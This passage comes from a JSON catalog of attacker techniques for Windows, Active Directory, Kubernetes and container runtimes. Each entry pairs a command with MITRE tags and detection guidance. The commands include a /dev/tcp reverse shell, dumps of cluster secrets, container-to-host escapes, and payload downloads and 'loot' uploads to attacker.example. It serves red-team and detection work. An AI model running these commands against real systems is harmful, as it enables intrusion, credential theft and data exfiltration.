authenticate back to a capture server, which is typically an ntlmrelayx or Responder listener. It is the on-host counterpart to printerbug.py and useful when operating entirely from a compromised Windows box under an existing user context. Requires the Print Spooler service to be running on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tCapture Server IP: 10.10.10.2","mitre":[],"requires":["Shell"],"services":["RPC","NTLM"],"references":["https://github.com/leechristensen/SpoolSample","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"added":true},{"id":"wadcoms:SweetPotato-SeImpersonate","toolId":"wadcoms:SweetPotato","toolName":"SweetPotato","name":"SweetPotato-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# -e selects the coercion primitive (EfsRpc | DCOM | WinRM | PrintSpoofer | PetitPotam)\nSweetPotato.exe -p C:\\Windows\\System32\\cmd.exe -a \"/c whoami\" -e EfsRpc","description":"SweetPotato bundles several SYSTEM-coercion primitives (EfsRpc, DCOM/RoguePotato-style OXID, PrintSpoofer, PetitPotam, WinRM) behind one binary, selected with -e, so you can fall back to whichever named-pipe or DCOM coercion the host permits. It captures the coerced SYSTEM token and launches the program in -p with the arguments in -a. Handy on IIS/MSSQL service accounts when you want to try multiple potato techniques without swapping tools. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tExploit mode: EfsRpc","mitre":[],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/CCob/SweetPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:Whisker-ShadowCredentials","toolId":"wadcoms:Whisker","toolName":"Whisker","name":"Whisker-ShadowCredentials","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Add a shadow credential to the target and get the follow-up Rubeus command\nWhisker.exe add /target:victim /domain:test.local /dc:dc.test.local","description":"Whisker is a C# tool that manipulates the msDS-KeyCredentialLink attribute to perform the Shadow Credentials attack from a Windows host. `Whisker.exe add` generates a certificate, adds the corresponding key credential to the target object, and prints a ready-to-run Rubeus asktgt PKINIT command to authenticate as the victim and recover its NT hash. It requires GenericWrite/GenericAll over the target and a DC that supports PKINIT (an enterprise CA present). Stealthier than a password reset because the account's password is unchanged.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDomain Controller: dc.test.local\n\n\tTarget account: victim","mitre":[],"requires":["Shell"],"services":["LDAP","ADCS"],"references":["https://github.com/eladshamir/Whisker","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"added":true},{"id":"daemon:kubectl:0","toolId":"daemon:kubectl","toolName":"kubectl","name":"Execute","source":"DAEMON","platform":["Linux","Windows"],"capability":["Execution","Reverse/Bind Shell"],"nativeCategory":["Execute","Container Administration"],"command":"kubectl exec -it pod-x -n ns-x -- /bin/sh\nkubectl exec pod-x -n ns-x -- bash -c \"bash -i >& /dev/tcp/10.10.10.10/4444 0>&1\"","description":"Runs an arbitrary command inside an already-running pod through the Kubernetes API's pods/exec subresource, giving an interactive shell without deploying anything new. With a token that has the exec verb, an operator can pivot into any reachable workload and, as shown, spawn a reverse shell back to a listener.","usecase":"Interactively run commands or pop a shell inside an existing pod using only exec RBAC, avoiding creation of new objects.","mitre":["T1609"],"privilege":"user","detection":[{"type":"Detection","value":"Kubernetes API audit log create events on the pods/exec subresource (objectRef.subresource=exec). Alert on exec into production/system namespaces, exec by service-account identities that normally never exec, and exec commands spawning shells (sh, bash, /dev/tcp). Correlate with kubelet logs."}],"references":["https://attack.mitre.org/techniques/T1609/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_exec/"],"added":true,"verifyNote":"MITRE T1609 page explicitly names `kubectl exec` as a procedure; kubectl_exec generated docs confirm -it/-n/-- syntax. Binary absent from GTFOBins/LOLBAS/WADComs."},{"id":"daemon:kubectl:1","toolId":"daemon:kubectl","toolName":"kubectl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access"],"command":"kubectl get secrets --all-namespaces -o json\nkubectl get secret secret-x -n ns-x -o jsonpath='{.data.token}' | base64 -d","description":"Lists Kubernetes Secret objects and dumps their contents. Secret data is only base64-encoded in the API, so a single get/list on the secrets resource returns service-account tokens, registry pull creds, TLS keys and app passwords in recoverable form. --all-namespaces harvests every namespace the identity can read.","usecase":"Harvest tokens, cloud keys and passwords cluster-wide from the API when the compromised identity holds get/list on secrets.","mitre":["T1552.007"],"privilege":"user","detection":[{"type":"Detection","value":"Enable RequestResponse-level audit on the secrets resource. Alert on list/get across many namespaces or all-namespaces, especially from service accounts. Red Canary Atomic T1552.007 mirrors this. Watch /api/v1/secrets and /api/v1/namespaces/*/secrets GET/LIST spikes."}],"references":["https://attack.mitre.org/techniques/T1552/007/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md","https://kubernetes.io/docs/concepts/configuration/secret/"],"added":true,"verifyNote":"MITRE T1552.007 (Container API) description explicitly covers using the Kubernetes API to retrieve Secrets; Red Canary Atomic T1552.007 replicates `kubectl get secrets`. Secrets are base64, not encrypted (k8s Secret docs)."},{"id":"daemon:kubectl:2","toolId":"daemon:kubectl","toolName":"kubectl","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Deploy Container"],"command":"kubectl run pod-x -n ns-x --restart=Never -it --rm --image=alpine --overrides='{\"spec\":{\"hostPID\":true,\"containers\":[{\"name\":\"c\",\"image\":\"alpine\",\"stdin\":true,\"tty\":true,\"command\":[\"/bin/sh\"],\"securityContext\":{\"privileged\":true},\"volumeMounts\":[{\"name\":\"host\",\"mountPath\":\"/host\"}]}],\"volumes\":[{\"name\":\"host\",\"hostPath\":{\"path\":\"/\"}}]}}'\n# then inside: chroot /host sh","description":"Uses the --overrides flag of kubectl run to inject a raw pod spec that is privileged, shares the host PID namespace and mounts the node root filesystem via a hostPath volume. Once scheduled, chroot /host yields a root shell on the underlying node, escaping the cluster's isolation boundary.","usecase":"Escape from cluster tenant to full node root when the identity can create pods with privileged/hostPath specs (no PodSecurity restricted).","mitre":["T1611","T1610"],"privilege":"user","detection":[{"type":"Detection","value":"Audit pods/create where securityContext.privileged=true, hostPID/hostNetwork/hostIPC=true, or volumes[].hostPath is set (especially path /). Enforce Pod Security Admission 'restricted' or an admission controller (OPA/Kyverno) to block these specs and alert on rejections."}],"references":["https://attack.mitre.org/techniques/T1611/","https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html"],"added":true,"verifyNote":"`--overrides` is a documented kubectl run flag (inline JSON merged into the generated object); kubernetes/kubectl#721 and HackTricks document it as the privileged/hostPath escape workaround. T1611 (Escape to Host)+T1610 (Deploy Container) correct."},{"id":"daemon:kubectl:3","toolId":"daemon:kubectl","toolName":"kubectl","name":"Node Access","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","File Read"],"nativeCategory":["Node Access","Escape to Host"],"command":"kubectl debug node/node-x -it --image=alpine --profile=sysadmin\n# then inside the debug pod: chroot /host sh","description":"kubectl debug node creates a debugging pod that runs in the target node's host namespaces with the node root filesystem mounted at /host. Combined with --profile=sysadmin (privileged) and chroot /host it provides root-level access to the node's disk and processes, a supported feature repurposed for host takeover.","usecase":"Obtain node filesystem/root access through the sanctioned node-debug path when create-pods on nodes is permitted.","mitre":["T1611"],"privilege":"user","detection":[{"type":"Detection","value":"Audit for pod create with names matching node-debugger-* and node-scoped debug pods carrying host namespaces or --profile=sysadmin. Alert on debug pods mounting /host or running chroot. Restrict the node/debug capability via RBAC."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/kubectl-node-debug/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_debug/"],"added":true,"verifyNote":"kubernetes.io 'Debugging Kubernetes Nodes With Kubectl' page (fetched live) confirms node root mounts at /host, that plain debug is not privileged so chroot /host fails unless `--profile=sysadmin` is used; T1611. Both refs live."},{"id":"daemon:kubectl:4","toolId":"daemon:kubectl","toolName":"kubectl","name":"File Copy","source":"DAEMON","platform":["Linux","Windows"],"capability":["File Copy","Collection"],"nativeCategory":["File Copy","Collection"],"command":"kubectl cp ns-x/pod-x:/etc/passwd /tmp/x\nkubectl cp /tmp/x ns-x/pod-x:/tmp/x","description":"Copies files and directories out of or into a pod. Under the hood kubectl cp streams a tar archive through the pods/exec subresource (the container image must contain tar), so it doubles as a data-exfiltration and tool-staging channel that only needs exec permission.","usecase":"Pull sensitive files out of a pod or stage attacker tooling into it using nothing but exec/cp rights.","mitre":["T1609"],"privilege":"user","detection":[{"type":"Detection","value":"cp rides pods/exec, so audit exec create events invoking tar (command contains 'tar -cf -' or 'tar -xmf -'). Alert on exec+tar into/out of sensitive workloads and on large streamed transfers correlated with exec sessions."}],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_cp/","https://attack.mitre.org/techniques/T1609/"],"added":true,"verifyNote":"kubectl_cp generated docs confirm cp streams a tar via the exec subresource and requires tar in the container image; T1609 justified because cp executes tar in-container. Absent from GTFOBins/LOLBAS."},{"id":"daemon:kubectl:5","toolId":"daemon:kubectl","toolName":"kubectl","name":"Discovery","source":"DAEMON","platform":["Linux"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"kubectl auth can-i --list\nkubectl auth can-i create pods -n ns-x\nkubectl auth can-i --list --as=system:serviceaccount:ns-x:sa-x","description":"Queries the RBAC authorizer (SelfSubjectRulesReview / SelfSubjectAccessReview) to enumerate exactly which resources and verbs the current identity is allowed. --list dumps the full permission matrix; --as combines with impersonation rights to map another subject's power without using its credentials.","usecase":"Enumerate the compromised token's RBAC reach (and plan escalation) before taking any noisy action.","mitre":["T1069"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create events on selfsubjectrulesreviews / selfsubjectaccessreviews (a public Sigma rule flags RBAC permission listing). A burst of can-i / --list right after a new token appears is a strong recon signal; alert on impersonation (--as) combined with these reviews."}],"references":["https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access","https://detection.fyi/sigmahq/sigma/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing/"],"added":true,"verifyNote":"can-i --list uses SelfSubjectRulesReview (k8s authz docs, 'Checking API access'); detection.fyi Sigma rule 'RBAC Permission Enumeration Attempt' fetched live (it tags T1069.003/T1087.004 — parent T1069 retained as correct)."},{"id":"daemon:kubectl:6","toolId":"daemon:kubectl","toolName":"kubectl","name":"Lateral Movement","source":"DAEMON","platform":["Linux"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement","Proxy"],"command":"kubectl port-forward svc/svc-x -n ns-x 8080:80\nkubectl port-forward --address 0.0.0.0 pod-x -n ns-x 8080:8080","description":"Opens a tunnel from the operator's machine, through the API server and kubelet, to a port on a pod or service via the pods/portforward subresource. This reaches ClusterIP-only services (databases, internal admin UIs, dashboards) that are otherwise unroutable, and --address 0.0.0.0 can expose the tunnel to other hosts.","usecase":"Reach cluster-internal services (DBs, dashboards, metadata proxies) from outside without deploying a pod.","mitre":["T1090.001"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create on the pods/portforward subresource (objectRef.subresource=portforward). Alert on port-forward to sensitive services (etcd, databases, dashboards), long-lived forwards, and --address bindings other than localhost."}],"references":["https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#port-forward","https://attack.mitre.org/techniques/T1090/001/"],"added":true,"verifyNote":"Command real: `kubectl port-forward` with the pods/portforward subresource and the `--address` flag are documented in kubectl docs. FIX: MITRE changed T1609->T1090.001 (Internal Proxy) and reference swapped accordingly — T1609 is defined as executing commands within a container, which port-forward does not do; it establishes a proxy tunnel to internal services."},{"id":"daemon:kubectl:7","toolId":"daemon:kubectl","toolName":"kubectl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Token Request"],"command":"kubectl create token sa-x -n ns-x --duration=999999h","description":"Requests a bound service-account token through the TokenRequest API. An identity that can create serviceaccounts/token for a more-privileged service account can mint a fresh bearer token for it and assume its permissions, with --duration pushing the expiry far out.","usecase":"Mint a valid bearer token for a higher-privileged service account to escalate or persist.","mitre":["T1528"],"privilege":"user","detection":[{"type":"Detection","value":"Audit create on the serviceaccounts/token subresource (TokenRequest). Alert when a subject requests tokens for service accounts it does not own, on unusually long --duration / requested expirationSeconds, and on token requests for privileged SAs (e.g. cluster-admin-bound)."}],"references":["https://kubernetes.io/docs/reference/kubectl/generated/kubectl_create/kubectl_create_token/","https://attack.mitre.org/techniques/T1528/"],"added":true,"verifyNote":"kubectl_create_token generated docs confirm `create token` is backed by the TokenRequest API and that `--duration` sets the requested token lifetime; T1528 (Steal Application Access Token) fits assuming a higher-priv SA. Server may cap very long durations, but the flag is real."},{"id":"daemon:kubectl:8","toolId":"daemon:kubectl","toolName":"kubectl","name":"Discovery","source":"DAEMON","platform":["Linux","Windows"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"kubectl get pods -A -o wide\nkubectl get nodes -o wide\nkubectl get all -A -o yaml","description":"Enumerates cluster resources: pods and their node placement/IPs, nodes and addresses, and full object manifests. -o yaml exposes environment variables, mounted volumes, image references and annotations that frequently leak credentials and reveal the escape/lateral-movement surface.","usecase":"Map workloads, nodes and embedded config/secrets to plan lateral movement and host escape.","mitre":["T1613"],"privilege":"user","detection":[{"type":"Detection","value":"Audit high-volume list/get across pods, nodes and other resources (especially -A / cluster-scoped) from a single identity in a short window. Baseline normal read patterns per service account and alert on broad enumeration by identities that usually touch one namespace."}],"references":["https://attack.mitre.org/techniques/T1613/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_get/"],"added":true,"verifyNote":"kubectl_get generated docs confirm -A/--all-namespaces, -o wide and -o yaml; T1613 (Container and Resource Discovery) is the correct technique for cluster resource enumeration."},{"id":"daemon:crictl:9","toolId":"daemon:crictl","toolName":"crictl","name":"Execute","source":"DAEMON","platform":["Linux"],"capability":["Execution"],"nativeCategory":["Execute","Container Administration"],"command":"crictl ps\ncrictl exec -it CONTAINERID sh","description":"crictl is the CRI debugging CLI that talks directly to the node's container runtime (containerd/CRI-O) socket, bypassing the API server and kubelet policy entirely. From a compromised node, crictl ps lists running containers and crictl exec drops an interactive shell into any of them, including other tenants' workloads.","usecase":"On a node, execute into any running container out-of-band of the Kubernetes API and its RBAC/audit.","mitre":["T1609"],"privilege":"admin","detection":[{"type":"Detection","value":"Node-level process/auditd monitoring: exec of crictl (and containerd-shim/runc exec children) not originating from kubelet. These actions bypass API audit, so rely on host EDR and file/socket access to /run/containerd/containerd.sock or /var/run/crio/crio.sock."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1609/"],"added":true,"verifyNote":"kubernetes.io crictl debug docs and cri-tools confirm `crictl ps` and `crictl exec -it`; crictl speaks directly to the CRI socket, bypassing apiserver/RBAC/audit. Not a GTFOBins/LOLBAS binary; T1609."},{"id":"daemon:crictl:10","toolId":"daemon:crictl","toolName":"crictl","name":"Credential Access","source":"DAEMON","platform":["Linux"],"capability":["Credential Access","Discovery"],"nativeCategory":["Credential Access","Discovery"],"command":"crictl ps -a\ncrictl inspect CONTAINERID","description":"crictl inspect returns a container's full CRI status JSON including its environment variables, command line, mounts and labels. Applications commonly pass secrets (DB passwords, API keys, tokens) as env vars, so inspecting containers on a node reveals those plaintext values without touching Kubernetes Secret objects or the API server.","usecase":"Read plaintext env-var secrets and mount layout of colocated containers straight from the node runtime.","mitre":["T1552.007","T1613"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for crictl inspect / inspectp / inspecti invocations on nodes outside of sanctioned tooling, and for reads of the containerd/CRI-O socket. Prefer mounting secrets as files with restrictive modes over env vars to shrink this exposure."}],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1552/007/"],"added":true,"verifyNote":"cri-tools/crictl docs confirm `crictl inspect` returns container status JSON incl. env vars (and inspectp/inspecti variants exist); reading runtime-held env secrets fits T1552.007 (Container API) + T1613 discovery."},{"id":"daemon:ctr:11","toolId":"daemon:ctr","toolName":"ctr","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"ctr image pull {REMOTEURL}/ubuntu:latest\nctr run --privileged --net-host -t {REMOTEURL}/ubuntu:latest esc bash\nctr run --mount type=bind,src=/,dst=/host,options=rbind:rw -t {REMOTEURL}/ubuntu:latest esc chroot /host bash","description":"ctr is containerd's low-level admin client. With access to the containerd socket an operator can pull an image and launch a container with --privileged/--net-host, or bind-mount the node root (src=/) into the container; chroot /host then yields a root shell on the node. It bypasses the kube-apiserver and any admission control.","usecase":"Turn containerd socket access on a node into node root via a privileged or host-bind-mount container.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for ctr invocations carrying --privileged, --net-host, or --mount type=bind,src=/ , and for access to /run/containerd/containerd.sock by non-kubelet processes. New containerd tasks from unexpected images/registries on a node are high-signal."}],"references":["https://hacktricks.wiki/en/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.html","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"HackTricks containerd-ctr page confirms the exact `ctr run --privileged --net-host` and `ctr run --mount type=bind,src=/,dst=/...` host-mount escapes; ctr is not a GTFOBins binary; T1611. (options=rbind:rw is a benign superset of the documented options=rbind.)"},{"id":"daemon:runc:12","toolId":"daemon:runc","toolName":"runc","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"runc spec\n# edit config.json mounts: {\"type\":\"bind\",\"source\":\"/\",\"destination\":\"/\",\"options\":[\"rbind\",\"rw\",\"rprivate\"]}\nmkdir rootfs\nrunc run esc","description":"runc is the OCI runtime under Docker/containerd/CRI-O. Where runc is available with root, an operator can generate an OCI bundle with runc spec, edit config.json to bind-mount the host root (source \"/\") into the container, and runc run it, producing a container whose filesystem is the node's, granting full host access outside any orchestration policy.","usecase":"Spawn an OCI container that bind-mounts the host root to reach node root when runc is runnable as root.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for runc spec and runc run invocations that are not children of containerd-shim/dockerd (i.e. manual bundles), and for config.json files whose mounts bind source \"/\". Flag new OCI bundle directories written to disk followed by runc run."}],"references":["https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"HackTricks runc page confirms `runc spec` -> edit config.json to bind-mount source '/' -> `runc run`; also confirms runc must run as root (privilege=admin). T1611; runc is not a GTFOBins binary."},{"id":"daemon:docker:13","toolId":"daemon:docker","toolName":"docker","name":"Collection","source":"DAEMON","platform":["Linux"],"capability":["Collection","File Read"],"nativeCategory":["Collection","Data Staging"],"command":"docker cp CONTAINERID:/etc/shadow /tmp/x\ndocker export CONTAINERID -o /tmp/x.tar\ndocker save IMAGE:latest -o /tmp/x.tar","description":"With Docker daemon access, docker cp pulls individual files out of any container's filesystem, docker export writes a tar snapshot of a container's whole filesystem, and docker save archives full images (all layers/history). Together they let an operator harvest other containers' files, embedded secrets and build-time credentials from a single node.","usecase":"Collect files, filesystem snapshots and image layers (with baked-in secrets) from colocated containers.","mitre":["T1005"],"privilege":"admin","detection":[{"type":"Detection","value":"docker events for export/save/cp actions and auditd for large tar writes by dockerd; flag export/save of containers or images the user did not create, and cp reads of sensitive paths (/etc/shadow, mounted secret volumes). Baseline legitimate backup jobs to reduce noise."}],"references":["https://docs.docker.com/reference/cli/docker/container/export/","https://docs.docker.com/reference/cli/docker/image/save/","https://attack.mitre.org/techniques/T1005/"],"added":true,"verifyNote":"docker export/save/cp CLI docs confirm the commands and -o/--output (export page fetched live). Criterion (e) caveat: `docker cp` overlaps the existing GTFOBins docker File-read/File-write functions, but `docker export`/`docker save` (whole-filesystem and whole-image tar for bulk collection, T1005) are additive and absent from GTFOBins — kept for that additive value."},{"id":"daemon:nerdctl:14","toolId":"daemon:nerdctl","toolName":"nerdctl","name":"Escape to Host","source":"DAEMON","platform":["Linux"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["Escape to Host","Bind Mount Escape"],"command":"nerdctl run --privileged --rm -it -v /:/host alpine chroot /host sh","description":"nerdctl is the Docker-compatible CLI for containerd and accepts docker run flags. On a node with containerd, an operator can run a --privileged container that bind-mounts the host root (-v /:/host) and chroot /host to obtain node root, the same host-mount escape as docker/ctr but through the nerdctl front-end.","usecase":"Escape to node root via containerd using familiar docker-style --privileged and host-mount flags.","mitre":["T1611"],"privilege":"admin","detection":[{"type":"Detection","value":"Auditd/EDR for nerdctl invocations with --privileged or -v /:/ (host-root bind) and for new containerd tasks not launched by kubelet. Restrict access to the containerd socket and to the nerdctl binary; alert on chroot into a host-root mount inside a container."}],"references":["https://github.com/containerd/nerdctl/blob/main/docs/command-reference.md","https://attack.mitre.org/techniques/T1611/"],"added":true,"verifyNote":"nerdctl command-reference confirms Docker-compatible `--privileged` and `-v` bind mounts; same host-mount escape as docker but nerdctl is NOT a GTFOBins/LOLBAS binary, so the entry is additive; T1611."},{"id":"daemon:msiexec:15","toolId":"daemon:msiexec","toolName":"msiexec.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","AWL / Policy Bypass"],"nativeCategory":["Execute"],"command":"msiexec /q /i https://attacker.example/x.msi","description":"The signed Windows Installer fetches and silently installs a remote MSI; the package's custom actions run arbitrary code under the trusted msiexec host. A signed vendor MSI can also be paired with a malicious remote transform: msiexec /i C:\\Windows\\Temp\\x.msi TRANSFORMS=\"https://attacker.example/x.mst\" /qb.","usecase":"Proxy execution of attacker code through a trusted, signed installer, including from a remote URL.","mitre":["T1218.007","T1105"],"privilege":"user","detection":[{"type":"Detection","value":"msiexec.exe with an http(s):// argument or a network-facing parent; msiexec.exe spawning cmd.exe/powershell.exe/rundll32; MSI or MST files written into INetCache; TRANSFORMS= pointing at a URL."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msiexec.yml","https://attack.mitre.org/techniques/T1218/007/"],"added":true,"verifyNote":"LOLBAS Msiexec.yml quotes both `msiexec /q /i {REMOTEURL}` and `msiexec /i {PATH} TRANSFORMS=\"{REMOTEURL:.mst}\" /qb`, MitreID T1218.007; verbatim match."},{"id":"daemon:curl:16","toolId":"daemon:curl","toolName":"curl.exe","name":"Download","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["File Download","File Upload"],"nativeCategory":["Download","Upload"],"command":"curl.exe -o C:\\Windows\\Temp\\x.exe http://attacker.example/x.exe\ncurl.exe -T C:\\Windows\\Temp\\loot.zip http://attacker.example/upload/","description":"curl.exe has shipped in-box on Windows 10 since build 1803 (and on macOS/Linux for years). -o/--output writes a downloaded URL to a chosen path (ingress transfer) and -T/--upload-file (or -d/--data for POST) exfiltrates a local file to a remote server, all from a Microsoft-signed binary.","usecase":"Download a payload or stage/exfiltrate data using a built-in, trusted HTTP client instead of certutil/bitsadmin.","mitre":["T1105","T1567"],"privilege":"user","detection":[{"type":"Detection","value":"curl.exe writing executable/script content with -o/-O; curl.exe -T/--upload-file or -d to external hosts; curl.exe with a non-interactive parent (office, script host); egress to newly-seen domains from curl.exe."}],"references":["https://curl.se/docs/manpage.html","https://curl.se/windows/"],"added":true,"verifyNote":"curl.se manpage documents -o/--output and -T/--upload-file (and -d/--data) exactly as described; curl.se/windows confirms the Microsoft-signed in-box build."},{"id":"daemon:tar:17","toolId":"daemon:tar","toolName":"tar.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download","Hide/ADS"],"command":"tar.exe -xf \\\\10.10.10.10\\share\\x.tar -C C:\\Windows\\Temp\ntar.exe -cf C:\\Windows\\Temp\\x.txt:evil.tar C:\\Windows\\Temp\\payload","description":"The in-box bsdtar (Windows 10 1803+) extracts an archive directly from a UNC/SMB path, pulling files from a remote host without a classic downloader (ingress transfer). tar can also read from and write to NTFS Alternate Data Streams (path:ads), hiding archived payloads inside a benign-looking file.","usecase":"Copy files in from a remote share, or stash a payload in an ADS to evade file-based detection, using a signed archiver.","mitre":["T1105","T1564.004"],"privilege":"user","detection":[{"type":"Detection","value":"tar.exe with a UNC (\\\\host\\share) source; tar.exe archive paths containing ':' (ADS notation); tar.exe making SMB/network connections; extraction into system-writable temp dirs."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Tar.yml","https://learn.microsoft.com/en-us/windows/tar/"],"added":true,"verifyNote":"LOLBAS Tar.yml documents `tar -xf {PATH_SMB:.tar}` (T1105) and `tar -cf {PATH}:ads {folder}` / `tar -xf {PATH}:ads` (T1564.004); both match."},{"id":"daemon:ssh:18","toolId":"daemon:ssh","toolName":"ssh.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["Execution","Library Load"],"nativeCategory":["Execute"],"command":"ssh.exe -o ProxyCommand=\"C:\\Windows\\Temp\\x.exe\" .\nssh.exe -o PKCS11Provider=\"\\\\10.10.10.10\\Temp\\x.dll\" user@test.local","description":"The in-box OpenSSH client (Windows 10 1809+) runs the string given in ProxyCommand/LocalCommand through the shell before it ever connects, giving indirect command execution under a signed binary. The PKCS11Provider option loads and executes an attacker DLL (DllMain / C_GetFunctionList) from a remote SMB share.","usecase":"Proxy-execute a command or side-load a DLL from a signed, trusted SSH client for defense evasion.","mitre":["T1202","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"ssh.exe with ProxyCommand/LocalCommand/PKCS11Provider on the command line; ssh.exe spawning cmd.exe/powershell.exe; ssh.exe loading a non-standard DLL from a UNC path; ssh.exe run with no legitimate remote host."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ssh.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Ssh.yml quotes `ssh -o ProxyCommand=\"{CMD}\" .` and `ssh -o PKCS11Provider=\"\\\\...\\example.dll\"` (DLL from SMB share), MitreID T1202; match. NOTE: secondary T1218 tag flagged in suspect — the PKCS11 DLL load maps better to T1574.002/T1129."},{"id":"daemon:scp:19","toolId":"daemon:scp","toolName":"scp.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["Execution","File Copy"],"nativeCategory":["Execute"],"command":"scp.exe -S C:\\Windows\\Temp\\x.exe . localhost:.\nscp.exe -o ProxyCommand=\"C:\\Windows\\Temp\\x.exe\" . localhost:.","description":"The in-box OpenSSH scp client spawns the program named by -S (alternate ssh program) or ProxyCommand even when no SSH server is listening, giving indirect command execution under a signed binary. scp also legitimately copies files to/from remote hosts and can be used to stage or exfiltrate data.","usecase":"Proxy-execute a command through scp->ssh, or move files off-host, using a signed binary.","mitre":["T1202","T1105"],"privilege":"user","detection":[{"type":"Detection","value":"scp.exe with -S or -o ProxyCommand; scp.exe child processes (cmd/powershell); scp.exe copying to/from external hosts; scp targeting localhost with no SSH service present."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Scp.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Scp.yml quotes both `scp.exe -S \"{CMD}\" . localhost:.` and `scp.exe -o ProxyCommand=\"{CMD}\" . localhost:.` (spawns even with no SSH), MitreID T1202; match."},{"id":"daemon:msedge:20","toolId":"daemon:msedge","toolName":"msedge.exe","name":"Download","source":"DAEMON","platform":["Windows","macOS","Linux"],"capability":["File Download","Execution"],"nativeCategory":["Download","Execute"],"command":"msedge.exe --headless --enable-logging --disable-gpu --dump-dom \"https://attacker.example/x.base64.html\" > C:\\Windows\\Temp\\x.b64\nmsedge.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\Temp\\x.exe &&\"","description":"Chromium browsers (Edge is preinstalled and signed; chrome.exe behaves identically) print the rendered DOM to stdout with --headless --dump-dom, letting an operator pull a base64 payload disguised as an .html page with no classic downloader on the command line. The --gpu-launcher switch runs an arbitrary command as a child of the signed browser (system binary proxy execution).","usecase":"Silently download a payload via a trusted browser, or proxy-execute a command under a signed browser process.","mitre":["T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"browser process (msedge.exe/chrome.exe) with --headless together with --dump-dom, or with --gpu-launcher/--utility-cmd-prefix/--renderer-cmd-prefix; browser redirecting stdout to a file; browser process whose parent is a script host or Office app."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msedge.yml","https://twitter.com/mrd0x/status/1478234484881436672"],"added":true,"verifyNote":"LOLBAS Msedge.yml (OSBinaries) documents `--headless --enable-logging --disable-gpu --dump-dom` (T1105) and `--disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"` (T1218.015); reference URL corrected to the OSBinaries YAML path."},{"id":"daemon:mpcmdrun:21","toolId":"daemon:mpcmdrun","toolName":"MpCmdRun.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download","ADS"],"command":"MpCmdRun.exe -DownloadFile -url https://attacker.example/x.exe -path C:\\Windows\\Temp\\x.exe\nMpCmdRun.exe -DownloadFile -url https://attacker.example/x.exe -path 